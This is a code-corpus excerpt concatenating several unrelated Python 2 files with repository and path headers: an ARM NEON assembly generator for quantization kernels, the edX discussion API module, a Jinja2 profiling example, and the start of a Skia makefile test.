self.input_range_scale = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('input_range_scale', 'params.input_range_scale'),
4)
self.one_over_output_range_scale = _DuplicateGeneralRegister(
32, emitter, registers,
registers.MapParameter('one_over_output_range_scale',
'params.one_over_output_range_scale'), 4)
emitter.EmitVSub('f32', self.range_min_delta, self.range_min_delta,
self.output_range_min)
def Transform(self, emitter, registers, input_address, elements,
output_address):
"""Emit requantization inner loop code."""
emitter.EmitNewline()
emitter.EmitComment('Requantize::Transform')
register_count = (elements + 3) / 4
load = [registers.QuadRegister() for unused_i in range(register_count)]
emitter.EmitVLoadAE(32, elements, load, input_address, None)
emitter.EmitPldOffset(input_address, emitter.ImmediateConstant(64))
for register in load:
emitter.EmitVCvt('f32', 's32', register, register)
for register in load:
emitter.EmitVSub('f32', register, register, self.input_range_offset)
for register in load:
emitter.EmitVMul('f32', register, register, self.input_range_scale)
for register in load:
emitter.EmitVAdd('f32', register, register, self.range_min_delta)
for register in load:
emitter.EmitVMul('f32', register, register,
self.one_over_output_range_scale)
for register in load:
emitter.EmitVCvt('s32', 'f32', register, register)
if len(load) is 1:
emitter.EmitVQmovn('s32', load[0], load[0])
emitter.EmitVQmovun('s16', load[0], load[0])
elif len(load) is 2:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovun('s16', load[0], load[0])
elif len(load) is 3:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovn('s32', load[2], load[2])
emitter.EmitVQmovun2('s16', load[0], load[0], load[2])
elif len(load) is 4:
emitter.EmitVQmovn2('s32', load[0], load[0], load[1])
emitter.EmitVQmovn2('s32', load[2], load[2], load[3])
emitter.EmitVQmovun2('s16', load[0], load[0], load[2])
else:
assert False
emitter.EmitNewline()
emitter.EmitVStoreAE(8, elements, load, output_address, None)
emitter.EmitPld(output_address)
registers.FreeRegisters(load)
class BaseTransform(common.Transform1DKernelGenerator):
"""."""
def __init__(self, cc_emitter, kernel_name, asm_emitter, transformation):
common.Transform1DKernelGenerator.__init__(self, cc_emitter, kernel_name)
self.asm_emitter = asm_emitter
self.transformation = transformation
def EmitTransform(self, in_type, out_type, kernel_size, leftovers):
"""."""
self.transformation.Check(in_type, out_type, kernel_size, leftovers)
registers = self.asm_emitter.CreateRegisters()
self.emitter.EmitDeclare('int', 'params_count_copy', 'params.count')
self.asm_emitter.PushIndent(self.emitter.indent)
self.asm_emitter.EmitAsmBegin()
count = registers.MapOutputParameter('count', 'params_count_copy')
input_address = registers.MapOutputParameter('input')
output_address = registers.MapOutputParameter('output')
self.transformation.Prepare(self.asm_emitter, registers, kernel_size)
if leftovers:
self.asm_emitter.EmitNewline()
self.asm_emitter.EmitComment('Reduce count by leftovers.')
self.asm_emitter.EmitSubs(count, count,
self.asm_emitter.ImmediateConstant(leftovers))
self.asm_emitter.EmitBeqFront(2)
self.asm_emitter.EmitNewline()
self.asm_emitter.EmitNumericalLabel(1)
self.asm_emitter.EmitSubs(count, count,
self.asm_emitter.ImmediateConstant(kernel_size))
self.transformation.Transform(self.asm_emitter, registers, input_address,
kernel_size, output_address)
self.asm_emitter.EmitNewline()
self.asm_emitter.EmitBneBack(1)
if leftovers:
self.asm_emitter.EmitNumericalLabel(2)
self.asm_emitter.EmitNewline()
self.asm_emitter.EmitComment('Handle leftovers.')
self.transformation.Transform(self.asm_emitter, registers, input_address,
leftovers, output_address)
self.asm_emitter.EmitAsmEnd(registers)
self.asm_emitter.PopIndent(len(self.emitter.indent))
class Requantize(BaseTransform):
"""."""
def __init__(self, cc_emitter, asm_emitter):
BaseTransform.__init__(self, cc_emitter, 'Requantize', asm_emitter,
RequantizeTransformation())
class Quantize(BaseTransform):
"""."""
def __init__(self, cc_emitter, asm_emitter):
BaseTransform.__init__(self, cc_emitter, 'Quantize', asm_emitter,
QuantizeTransformation())
class Dequantize(BaseTransform):
"""."""
def __init__(self, cc_emitter, asm_emitter):
BaseTransform.__init__(self, cc_emitter, 'Dequantize', asm_emitter,
DequantizeTransformation())
class MinMax(BaseTransform):
"""."""
def __init__(self, numerical_type, cc_emitter, asm_emitter):
BaseTransform.__init__(self, cc_emitter, 'MinMax<%s>' % numerical_type,
asm_emitter, MinMaxTransformation())
class BiasAdd(common.Transform1DKernelGenerator):
"""."""
def __init__(self, bias_type, cc_emitter, asm_emitter):
common.Transform1DKernelGenerator.__init__(self, cc_emitter,
'BiasAdd<%s>' % bias_type)
self.asm_emitter = asm_emitter
def EmitTransform(self, in_type, out_type, kernel_size, leftovers):
"""."""
assert in_type is 'uint8_t'
assert out_type is 'int32_t'
assert kernel_size is 16
assert leftovers < 16
registers = self.asm_emitter.CreateRegisters()
self.emitter.EmitDeclare('int', 'params_rows_copy', 'params.rows')
self.asm_emitter.PushIndent(self.emitter.indent)
self.asm_emitter.EmitAsmBegin()
self._Prepare(self.asm_emitter, registers)
rows = registers.MapParameter('rows', 'params_rows_copy')
self.asm_emitter.EmitNumericalLabel(1)
self._ProcessRow(self.asm_emitter, registers, kernel_size, leftovers)
self.asm_emitter.EmitSubs(rows, rows, self.asm_emitter.ImmediateConstant(1))
self.asm_emitter.EmitBneBack(1)
self.asm_emitter.EmitAsmEnd(registers)
self.asm_emitter.PopIndent(len(self.emitter.indent))
def _Prepare(self, emitter, registers):
self.input_range_min = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('input_range_min',
'params.input_range_min'), 8)
self.input_range_scale = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('input_range_scale',
'params.input_range_scale'), 8)
self.bias_range_min = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('bias_range_min', 'params.bias_range_min'),
8)
self.bias_range_scale = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('bias_range_scale',
'params.bias_range_scale'), 8)
self.output_range_min = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('output_range_min',
'params.output_range_min'), 8)
self.one_over_output_range_scale = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('one_over_output_range_scale',
'params.one_over_output_range_scale'), 8)
self.output_range_offset = _DuplicateGeneralMemoryRegister(
32, emitter, registers,
registers.MapMemoryParameter('output_range_offset',
'params.output_range_offset'), 8)
def _ProcessRow(self, emitter, registers, kernel_size, leftovers):
const_count = registers.MapParameter('count', 'params.count')
const_bias = registers.MapParameter('bias', 'params.bias')
count = registers.GeneralRegister()
bias = registers.GeneralRegister()
input_address = registers.MapOutputParameter('input')
output_address = registers.MapOutputParameter('output')
emitter.EmitMov(count, const_count)
emitter.EmitMov(bias, const_bias)
if leftovers:
emitter.EmitSubs(count, count, emitter.ImmediateConstant(leftovers))
emitter.EmitBeqFront(3)
emitter.EmitNumericalLabel(2)
emitter.EmitSubs(count, count, emitter.ImmediateConstant(kernel_size))
self._BiasAdd(emitter, registers, kernel_size, input_address, bias,
output_address)
emitter.EmitBneBack(2)
if leftovers:
emitter.EmitNumericalLabel(3)
self._BiasAdd(emitter, registers, leftovers, input_address, bias,
output_address)
def _BiasAdd(self, emitter, registers, elements, input_address, bias,
output_address):
emitter.EmitNewline()
emitter.EmitComment('BiasAdd::Transform')
register_count = (elements + 3) / 4
load_input = [
registers.QuadRegister() for unused_i in range(register_count)
]
load_bias = [registers.QuadRegister() for unused_i in range(register_count)]
emitter.EmitVLoadAE(8, elements, load_input, input_address, None)
emitter.EmitVLoadAE(8, elements, load_bias, bias, None)
emitter.EmitPldOffset(input_address, emitter.ImmediateConstant(32))
if len(load_input) is 1:
emitter.EmitVMovl('u8', load_input[0], load_input[0])
emitter.EmitVMovl('u8', load_bias[0], load_bias[0])
emitter.EmitVMovl('s16', load_input[0], load_input[0])
emitter.EmitVMovl('s16', load_bias[0], load_bias[0])
elif len(load_input) is 2:
emitter.EmitVMovl('u8', load_input[0], load_input[0])
emitter.EmitVMovl('u8', load_bias[0], load_bias[0])
emitter.EmitVMovl2('s16', load_input[0], load_input[1], load_input[0])
emitter.EmitVMovl2('s16', load_bias[0], load_bias[1], load_bias[0])
elif len(load_input) is 3:
emitter.EmitVMovl2('u8', load_input[0], load_input[1], load_input[0])
emitter.EmitVMovl2('u8', load_bias[0], load_bias[1], load_bias[0])
emitter.EmitVMovl('s16', load_input[2], load_input[1])
emitter.EmitVMovl('s16', load_bias[2], load_bias[1])
emitter.EmitVMovl2('s16', load_input[0], load_input[1], load_input[0])
emitter.EmitVMovl2('s16', load_bias[0], load_bias[1], load_bias[0])
elif len(load_input) is 4:
emitter.EmitVMovl2('u8', load_input[0], load_input[1], load_input[0])
emitter.EmitVMovl2('u8', load_bias[0], load_bias[1], load_bias[0])
emitter.EmitVMovl2('s16', load_input[2], load_input[3], load_input[1])
emitter.EmitVMovl2('s16', load_bias[2], load_bias[3], load_bias[1])
emitter.EmitVMovl2('s16', load_input[0], load_input[1], load_input[0])
emitter.EmitVMovl2('s16', load_bias[0], load_bias[1], load_bias[0])
else:
assert False
for register in load_input + load_bias:
emitter.EmitVCvt('f32', 's32', register, register)
for register in load_input:
emitter.EmitVMul('f32', register, register, self.input_range_scale)
for register in load_bias:
emitter.EmitVMul('f32', register, register, self.bias_range_scale)
for register in load_input:
emitter.EmitVAdd('f32', register, register, self.input_range_min)
for register in load_bias:
emitter.EmitVAdd('f32', register, register, self.bias_range_min)
for (register_1, register_2) in zip(load_input, load_bias):
emitter.EmitVAdd('f32', register_1, register_1, register_2)
for register in load_input:
emitter.EmitVSub('f32', register, register, self.output_range_min)
for register in load_input:
emitter.EmitVMul('f32', register, register,
self.one_over_output_range_scale)
for register in load_input:
emitter.EmitVAdd('f32', register, register, self.output_range_offset)
for register in load_input:
emitter.EmitVCvt('s32', 'f32', register, register)
emitter.EmitNewline()
emitter.EmitVStoreAE(32, elements, load_input, output_address, None)
emitter.EmitPld(output_address)
registers.FreeRegisters(load_input + load_bias)
def GenerateKernels(cc_emitter, asm_emitter, shapes):
"""Generate the quantization/dequantization/requantization kernels."""
requantize = Requantize(cc_emitter, asm_emitter)
quantize = Quantize(cc_emitter, asm_emitter)
dequantize = Dequantize(cc_emitter, asm_emitter)
minmax = MinMax('uint8_t', cc_emitter, asm_emitter)
biasadd = BiasAdd('uint8_t', cc_emitter, asm_emitter)
for shape in shapes:
requantize.SpecializeTransform1DKernel('int32_t', 'uint8_t', shape[0],
shape[1])
for shape in shapes:
quantize.SpecializeTransform1DKernel('float', 'uint8_t', shape[0], shape[1])
for shape in shapes:
dequantize.SpecializeTransform1DKernel('uint8_t', 'float', shape[0],
shape[1])
for shape in shapes:
minmax.SpecializeTransform1DKernel('uint8_t', 'uint8_t', shape[0], shape[1])
for shape in shapes:
biasadd.SpecializeTransform1DKernel('uint8_t', 'int32_t', shape[0],
shape[1])
|
doismellburning/edx-platform
|
refs/heads/master
|
lms/djangoapps/discussion_api/api.py
|
5
|
"""
Discussion API internal interface
"""
from collections import defaultdict
from urllib import urlencode
from urlparse import urlunparse
from django.core.exceptions import ValidationError
from django.core.urlresolvers import reverse
from django.http import Http404
from rest_framework.exceptions import PermissionDenied
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locator import CourseKey
from courseware.courses import get_course_with_access
from discussion_api.forms import CommentActionsForm, ThreadActionsForm
from discussion_api.pagination import get_paginated_data
from discussion_api.permissions import (
can_delete,
get_editable_fields,
get_initializable_comment_fields,
get_initializable_thread_fields,
)
from discussion_api.serializers import CommentSerializer, ThreadSerializer, get_context
from django_comment_client.base.views import (
THREAD_CREATED_EVENT_NAME,
get_comment_created_event_data,
get_comment_created_event_name,
get_thread_created_event_data,
track_forum_event,
)
from django_comment_common.signals import (
thread_created,
thread_edited,
thread_deleted,
thread_voted,
comment_created,
comment_edited,
comment_voted,
comment_deleted,
)
from django_comment_client.utils import get_accessible_discussion_modules, is_commentable_cohorted
from lms.lib.comment_client.comment import Comment
from lms.lib.comment_client.thread import Thread
from lms.lib.comment_client.utils import CommentClientRequestError
from openedx.core.djangoapps.course_groups.cohorts import get_cohort_id
def _get_course_or_404(course_key, user):
"""
Get the course descriptor, raising Http404 if the course is not found,
the user cannot access forums for the course, or the discussion tab is
disabled for the course.
"""
course = get_course_with_access(user, 'load', course_key, check_if_enrolled=True)
if not any([tab.type == 'discussion' for tab in course.tabs]):
raise Http404
return course
def _get_thread_and_context(request, thread_id, retrieve_kwargs=None):
"""
Retrieve the given thread and build a serializer context for it, returning
both. This function also enforces access control for the thread (checking
both the user's access to the course and to the thread's cohort if
applicable). Raises Http404 if the thread does not exist or the user cannot
access it.
"""
retrieve_kwargs = retrieve_kwargs or {}
try:
if "mark_as_read" not in retrieve_kwargs:
retrieve_kwargs["mark_as_read"] = False
cc_thread = Thread(id=thread_id).retrieve(**retrieve_kwargs)
course_key = CourseKey.from_string(cc_thread["course_id"])
course = _get_course_or_404(course_key, request.user)
context = get_context(course, request, cc_thread)
if (
not context["is_requester_privileged"] and
cc_thread["group_id"] and
is_commentable_cohorted(course.id, cc_thread["commentable_id"])
):
requester_cohort = get_cohort_id(request.user, course.id)
if requester_cohort is not None and cc_thread["group_id"] != requester_cohort:
raise Http404
return cc_thread, context
except CommentClientRequestError:
# params are validated at a higher level, so the only possible request
# error is if the thread doesn't exist
raise Http404
def _get_comment_and_context(request, comment_id):
"""
Retrieve the given comment and build a serializer context for it, returning
both. This function also enforces access control for the comment (checking
both the user's access to the course and to the comment's thread's cohort if
applicable). Raises Http404 if the comment does not exist or the user cannot
access it.
"""
try:
cc_comment = Comment(id=comment_id).retrieve()
_, context = _get_thread_and_context(request, cc_comment["thread_id"])
return cc_comment, context
except CommentClientRequestError:
raise Http404
def _is_user_author_or_privileged(cc_content, context):
"""
Check if the user is the author of a content object or a privileged user.
Returns:
Boolean
"""
return (
context["is_requester_privileged"] or
context["cc_requester"]["id"] == cc_content["user_id"]
)
def get_thread_list_url(request, course_key, topic_id_list=None, following=False):
"""
Returns the URL for the thread_list_url field, given a list of topic_ids
"""
path = reverse("thread-list")
query_list = (
[("course_id", unicode(course_key))] +
[("topic_id", topic_id) for topic_id in topic_id_list or []] +
([("following", following)] if following else [])
)
return request.build_absolute_uri(urlunparse(("", "", path, "", urlencode(query_list), "")))
def get_course(request, course_key):
"""
Return general discussion information for the course.
Parameters:
request: The django request object used for build_absolute_uri and
determining the requesting user.
course_key: The key of the course to get information for
Returns:
The course information; see discussion_api.views.CourseView for more
detail.
Raises:
Http404: if the course does not exist or is not accessible to the
requesting user
"""
course = _get_course_or_404(course_key, request.user)
return {
"id": unicode(course_key),
"blackouts": [
{"start": blackout["start"].isoformat(), "end": blackout["end"].isoformat()}
for blackout in course.get_discussion_blackout_datetimes()
],
"thread_list_url": get_thread_list_url(request, course_key),
"following_thread_list_url": get_thread_list_url(request, course_key, following=True),
"topics_url": request.build_absolute_uri(
reverse("course_topics", kwargs={"course_id": course_key})
)
}
def get_course_topics(request, course_key):
"""
Return the course topic listing for the given course and user.
Parameters:
course_key: The key of the course to get topics for
user: The requesting user, for access control
Returns:
A course topic listing dictionary; see discussion_api.views.CourseTopicViews
for more detail.
"""
def get_module_sort_key(module):
"""
Get the sort key for the module (falling back to the discussion_target
setting if absent)
"""
return module.sort_key or module.discussion_target
course = _get_course_or_404(course_key, request.user)
discussion_modules = get_accessible_discussion_modules(course, request.user)
modules_by_category = defaultdict(list)
for module in discussion_modules:
modules_by_category[module.discussion_category].append(module)
def get_sorted_modules(category):
"""Returns key sorted modules by category"""
return sorted(modules_by_category[category], key=get_module_sort_key)
courseware_topics = [
{
"id": None,
"name": category,
"thread_list_url": get_thread_list_url(
request,
course_key,
[item.discussion_id for item in get_sorted_modules(category)]
),
"children": [
{
"id": module.discussion_id,
"name": module.discussion_target,
"thread_list_url": get_thread_list_url(request, course_key, [module.discussion_id]),
"children": [],
}
for module in get_sorted_modules(category)
],
}
for category in sorted(modules_by_category.keys())
]
non_courseware_topics = [
{
"id": entry["id"],
"name": name,
"thread_list_url": get_thread_list_url(request, course_key, [entry["id"]]),
"children": [],
}
for name, entry in sorted(
course.discussion_topics.items(),
key=lambda item: item[1].get("sort_key", item[0])
)
]
return {
"courseware_topics": courseware_topics,
"non_courseware_topics": non_courseware_topics,
}
def get_thread_list(
request,
course_key,
page,
page_size,
topic_id_list=None,
text_search=None,
following=False,
view=None,
order_by="last_activity_at",
order_direction="desc",
):
"""
Return the list of all discussion threads pertaining to the given course
Parameters:
request: The django request objects used for build_absolute_uri
course_key: The key of the course to get discussion threads for
page: The page number (1-indexed) to retrieve
page_size: The number of threads to retrieve per page
topic_id_list: The list of topic_ids to get the discussion threads for
text_search A text search query string to match
following: If true, retrieve only threads the requester is following
view: filters for either "unread" or "unanswered" threads
order_by: The key in which to sort the threads by. The only values are
"last_activity_at", "comment_count", and "vote_count". The default is
"last_activity_at".
order_direction: The direction in which to sort the threads by. The only
values are "asc" or "desc". The default is "desc".
Note that topic_id_list, text_search, and following are mutually exclusive.
Returns:
A paginated result containing a list of threads; see
discussion_api.views.ThreadViewSet for more detail.
Raises:
ValidationError: if an invalid value is passed for a field.
ValueError: if more than one of the mutually exclusive parameters is
provided
Http404: if the requesting user does not have access to the requested course
or a page beyond the last is requested
"""
exclusive_param_count = sum(1 for param in [topic_id_list, text_search, following] if param)
if exclusive_param_count > 1: # pragma: no cover
raise ValueError("More than one mutually exclusive param passed to get_thread_list")
cc_map = {"last_activity_at": "date", "comment_count": "comments", "vote_count": "votes"}
if order_by not in cc_map:
raise ValidationError({
"order_by":
["Invalid value. '{}' must be 'last_activity_at', 'comment_count', or 'vote_count'".format(order_by)]
})
if order_direction not in ["asc", "desc"]:
raise ValidationError({
"order_direction": ["Invalid value. '{}' must be 'asc' or 'desc'".format(order_direction)]
})
course = _get_course_or_404(course_key, request.user)
context = get_context(course, request)
query_params = {
"user_id": unicode(request.user.id),
"group_id": (
None if context["is_requester_privileged"] else
get_cohort_id(request.user, course.id)
),
"page": page,
"per_page": page_size,
"text": text_search,
"sort_key": cc_map.get(order_by),
"sort_order": order_direction,
}
text_search_rewrite = None
if view:
if view in ["unread", "unanswered"]:
query_params[view] = "true"
else:
ValidationError({
"view": ["Invalid value. '{}' must be 'unread' or 'unanswered'".format(view)]
})
if following:
threads, result_page, num_pages = context["cc_requester"].subscribed_threads(query_params)
else:
query_params["course_id"] = unicode(course.id)
query_params["commentable_ids"] = ",".join(topic_id_list) if topic_id_list else None
query_params["text"] = text_search
threads, result_page, num_pages, text_search_rewrite = Thread.search(query_params)
# The comments service returns the last page of results if the requested
# page is beyond the last page, but we want be consistent with DRF's general
# behavior and return a 404 in that case
if result_page != page:
raise Http404
results = [ThreadSerializer(thread, remove_fields=['response_count'], context=context).data for thread in threads]
ret = get_paginated_data(request, results, page, num_pages)
ret["text_search_rewrite"] = text_search_rewrite
return ret
def get_comment_list(request, thread_id, endorsed, page, page_size, mark_as_read=False):
"""
Return the list of comments in the given thread.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
thread_id: The id of the thread to get comments for.
endorsed: Boolean indicating whether to get endorsed or non-endorsed
comments (or None for all comments). Must be None for a discussion
thread and non-None for a question thread.
page: The page number (1-indexed) to retrieve
page_size: The number of comments to retrieve per page
mark_as_read: Marks the thread of the comment list as read.
Returns:
A paginated result containing a list of comments; see
discussion_api.views.CommentViewSet for more detail.
"""
response_skip = page_size * (page - 1)
cc_thread, context = _get_thread_and_context(
request,
thread_id,
retrieve_kwargs={
"recursive": True,
"user_id": request.user.id,
"mark_as_read": mark_as_read,
"response_skip": response_skip,
"response_limit": page_size,
}
)
# Responses to discussion threads cannot be separated by endorsed, but
# responses to question threads must be separated by endorsed due to the
# existing comments service interface
if cc_thread["thread_type"] == "question":
if endorsed is None:
raise ValidationError({"endorsed": ["This field is required for question threads."]})
elif endorsed:
# CS does not apply resp_skip and resp_limit to endorsed responses
# of a question post
responses = cc_thread["endorsed_responses"][response_skip:(response_skip + page_size)]
resp_total = len(cc_thread["endorsed_responses"])
else:
responses = cc_thread["non_endorsed_responses"]
resp_total = cc_thread["non_endorsed_resp_total"]
else:
if endorsed is not None:
raise ValidationError(
{"endorsed": ["This field may not be specified for discussion threads."]}
)
responses = cc_thread["children"]
resp_total = cc_thread["resp_total"]
# The comments service returns the last page of results if the requested
# page is beyond the last page, but we want be consistent with DRF's general
# behavior and return a 404 in that case
if not responses and page != 1:
raise Http404
num_pages = (resp_total + page_size - 1) / page_size if resp_total else 1
results = [CommentSerializer(response, context=context).data for response in responses]
return get_paginated_data(request, results, page, num_pages)
def _check_fields(allowed_fields, data, message):
"""
Checks that the keys given in data is in allowed_fields
Arguments:
allowed_fields (set): A set of allowed fields
data (dict): The data to compare the allowed_fields against
message (str): The message to return if there are any invalid fields
Raises:
ValidationError if the given data contains a key that is not in
allowed_fields
"""
non_allowed_fields = {field: [message] for field in data.keys() if field not in allowed_fields}
if non_allowed_fields:
raise ValidationError(non_allowed_fields)
def _check_initializable_thread_fields(data, context): # pylint: disable=invalid-name
"""
Checks if the given data contains a thread field that is not initializable
by the requesting user
Arguments:
data (dict): The data to compare the allowed_fields against
context (dict): The context appropriate for use with the thread which
includes the requesting user
Raises:
ValidationError if the given data contains a thread field that is not
initializable by the requesting user
"""
_check_fields(
get_initializable_thread_fields(context),
data,
"This field is not initializable."
)
def _check_initializable_comment_fields(data, context): # pylint: disable=invalid-name
"""
Checks if the given data contains a comment field that is not initializable
by the requesting user
Arguments:
data (dict): The data to compare the allowed_fields against
context (dict): The context appropriate for use with the comment which
includes the requesting user
Raises:
ValidationError if the given data contains a comment field that is not
initializable by the requesting user
"""
_check_fields(
get_initializable_comment_fields(context),
data,
"This field is not initializable."
)
def _check_editable_fields(cc_content, data, context):
"""
Raise ValidationError if the given update data contains a field that is not
editable by the requesting user
"""
_check_fields(
get_editable_fields(cc_content, context),
data,
"This field is not editable."
)
def _do_extra_actions(api_content, cc_content, request_fields, actions_form, context):
"""
Perform any necessary additional actions related to content creation or
update that require a separate comments service request.
"""
for field, form_value in actions_form.cleaned_data.items():
if field in request_fields and form_value != api_content[field]:
api_content[field] = form_value
if field == "following":
if form_value:
context["cc_requester"].follow(cc_content)
else:
context["cc_requester"].unfollow(cc_content)
elif field == "abuse_flagged":
if form_value:
cc_content.flagAbuse(context["cc_requester"], cc_content)
else:
cc_content.unFlagAbuse(context["cc_requester"], cc_content, removeAll=False)
else:
assert field == "voted"
signal = thread_voted if cc_content.type == 'thread' else comment_voted
signal.send(sender=None, user=context["request"].user, post=cc_content)
if form_value:
context["cc_requester"].vote(cc_content, "up")
api_content["vote_count"] += 1
else:
context["cc_requester"].unvote(cc_content)
api_content["vote_count"] -= 1
def create_thread(request, thread_data):
"""
Create a thread.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
thread_data: The data for the created thread.
Returns:
The created thread; see discussion_api.views.ThreadViewSet for more
detail.
"""
course_id = thread_data.get("course_id")
user = request.user
if not course_id:
raise ValidationError({"course_id": ["This field is required."]})
try:
course_key = CourseKey.from_string(course_id)
course = _get_course_or_404(course_key, user)
except (Http404, InvalidKeyError):
raise ValidationError({"course_id": ["Invalid value."]})
context = get_context(course, request)
_check_initializable_thread_fields(thread_data, context)
if (
"group_id" not in thread_data and
is_commentable_cohorted(course_key, thread_data.get("topic_id"))
):
thread_data = thread_data.copy()
thread_data["group_id"] = get_cohort_id(user, course_key)
serializer = ThreadSerializer(data=thread_data, remove_fields=['response_count'], context=context)
actions_form = ThreadActionsForm(thread_data)
if not (serializer.is_valid() and actions_form.is_valid()):
raise ValidationError(dict(serializer.errors.items() + actions_form.errors.items()))
serializer.save()
cc_thread = serializer.instance
thread_created.send(sender=None, user=user, post=cc_thread)
api_thread = serializer.data
_do_extra_actions(api_thread, cc_thread, thread_data.keys(), actions_form, context)
track_forum_event(
request,
THREAD_CREATED_EVENT_NAME,
course,
cc_thread,
get_thread_created_event_data(cc_thread, followed=actions_form.cleaned_data["following"])
)
return api_thread
def create_comment(request, comment_data):
"""
Create a comment.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
comment_data: The data for the created comment.
Returns:
The created comment; see discussion_api.views.CommentViewSet for more
detail.
"""
thread_id = comment_data.get("thread_id")
if not thread_id:
raise ValidationError({"thread_id": ["This field is required."]})
try:
cc_thread, context = _get_thread_and_context(request, thread_id)
except Http404:
raise ValidationError({"thread_id": ["Invalid value."]})
_check_initializable_comment_fields(comment_data, context)
serializer = CommentSerializer(data=comment_data, context=context)
actions_form = CommentActionsForm(comment_data)
if not (serializer.is_valid() and actions_form.is_valid()):
raise ValidationError(dict(serializer.errors.items() + actions_form.errors.items()))
serializer.save()
cc_comment = serializer.instance
comment_created.send(sender=None, user=request.user, post=cc_comment)
api_comment = serializer.data
_do_extra_actions(api_comment, cc_comment, comment_data.keys(), actions_form, context)
track_forum_event(
request,
get_comment_created_event_name(cc_comment),
context["course"],
cc_comment,
get_comment_created_event_data(cc_comment, cc_thread["commentable_id"], followed=False)
)
return api_comment
def update_thread(request, thread_id, update_data):
"""
Update a thread.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
thread_id: The id for the thread to update.
update_data: The data to update in the thread.
Returns:
The updated thread; see discussion_api.views.ThreadViewSet for more
detail.
"""
cc_thread, context = _get_thread_and_context(request, thread_id)
_check_editable_fields(cc_thread, update_data, context)
serializer = ThreadSerializer(cc_thread, remove_fields=['response_count'], data=update_data, partial=True,
context=context)
actions_form = ThreadActionsForm(update_data)
if not (serializer.is_valid() and actions_form.is_valid()):
raise ValidationError(dict(serializer.errors.items() + actions_form.errors.items()))
# Only save thread object if some of the edited fields are in the thread data, not extra actions
if set(update_data) - set(actions_form.fields):
serializer.save()
# signal to update Teams when a user edits a thread
thread_edited.send(sender=None, user=request.user, post=cc_thread)
api_thread = serializer.data
_do_extra_actions(api_thread, cc_thread, update_data.keys(), actions_form, context)
return api_thread
def update_comment(request, comment_id, update_data):
"""
Update a comment.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
comment_id: The id for the comment to update.
update_data: The data to update in the comment.
Returns:
The updated comment; see discussion_api.views.CommentViewSet for more
detail.
Raises:
Http404: if the comment does not exist or is not accessible to the
requesting user
PermissionDenied: if the comment is accessible to but not editable by
the requesting user
ValidationError: if there is an error applying the update (e.g. raw_body
is empty or thread_id is included)
"""
cc_comment, context = _get_comment_and_context(request, comment_id)
_check_editable_fields(cc_comment, update_data, context)
serializer = CommentSerializer(cc_comment, data=update_data, partial=True, context=context)
actions_form = CommentActionsForm(update_data)
if not (serializer.is_valid() and actions_form.is_valid()):
raise ValidationError(dict(serializer.errors.items() + actions_form.errors.items()))
# Only save comment object if some of the edited fields are in the comment data, not extra actions
if set(update_data) - set(actions_form.fields):
serializer.save()
comment_edited.send(sender=None, user=request.user, post=cc_comment)
api_comment = serializer.data
_do_extra_actions(api_comment, cc_comment, update_data.keys(), actions_form, context)
return api_comment
def get_thread(request, thread_id):
"""
Retrieve a thread.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
thread_id: The id for the thread to retrieve
"""
cc_thread, context = _get_thread_and_context(request, thread_id)
serializer = ThreadSerializer(cc_thread, context=context)
return serializer.data
def delete_thread(request, thread_id):
"""
Delete a thread.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
thread_id: The id for the thread to delete
Raises:
PermissionDenied: if user does not have permission to delete thread
"""
cc_thread, context = _get_thread_and_context(request, thread_id)
if can_delete(cc_thread, context):
cc_thread.delete()
thread_deleted.send(sender=None, user=request.user, post=cc_thread)
else:
raise PermissionDenied
def delete_comment(request, comment_id):
"""
Delete a comment.
Arguments:
request: The django request object used for build_absolute_uri and
determining the requesting user.
comment_id: The id of the comment to delete
Raises:
PermissionDenied: if user does not have permission to delete thread
"""
cc_comment, context = _get_comment_and_context(request, comment_id)
if can_delete(cc_comment, context):
cc_comment.delete()
comment_deleted.send(sender=None, user=request.user, post=cc_comment)
else:
raise PermissionDenied
|
brstew/MBED-BUILD
|
refs/heads/master
|
Jinja2-2.8/examples/profile.py
|
75
|
try:
from cProfile import Profile
except ImportError:
from profile import Profile
from pstats import Stats
from jinja2 import Environment as JinjaEnvironment
context = {
'page_title': 'mitsuhiko\'s benchmark',
'table': [dict(a=1,b=2,c=3,d=4,e=5,f=6,g=7,h=8,i=9,j=10) for x in range(1000)]
}
source = """\
% macro testmacro(x)
<span>${x}</span>
% endmacro
<!doctype html>
<html>
<head>
<title>${page_title|e}</title>
</head>
<body>
<div class="header">
<h1>${page_title|e}</h1>
</div>
<div class="table">
<table>
% for row in table
<tr>
% for cell in row
<td>${testmacro(cell)}</td>
% endfor
</tr>
% endfor
</table>
</div>
</body>
</html>\
"""
jinja_template = JinjaEnvironment(
line_statement_prefix='%',
variable_start_string="${",
variable_end_string="}"
).from_string(source)
print jinja_template.environment.compile(source, raw=True)
p = Profile()
p.runcall(lambda: jinja_template.render(context))
stats = Stats(p)
stats.sort_stats('time', 'calls')
stats.print_stats()
|
xin3liang/platform_external_chromium_org_third_party_skia
|
refs/heads/master
|
platform_tools/android/tests/makefile_writer_tests.py
|
65
|
#!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Test makefile_writer.py
"""
import argparse
import os
import shutil
import sys
import tempfile
import test_variables
import unittest
import utils
sys.path.append(test_variables.GYP_GEN_DIR)
import makefile_writer
import tool_makefile_writer
import vars_dict_lib
MAKEFILE_NAME = test_variables.ANDROID_MK
REBASELINE_MSG = ('If you\'ve modified makefile_writer.py, run '
'"makefile_writer_tests.py --rebaseline" to rebaseline')
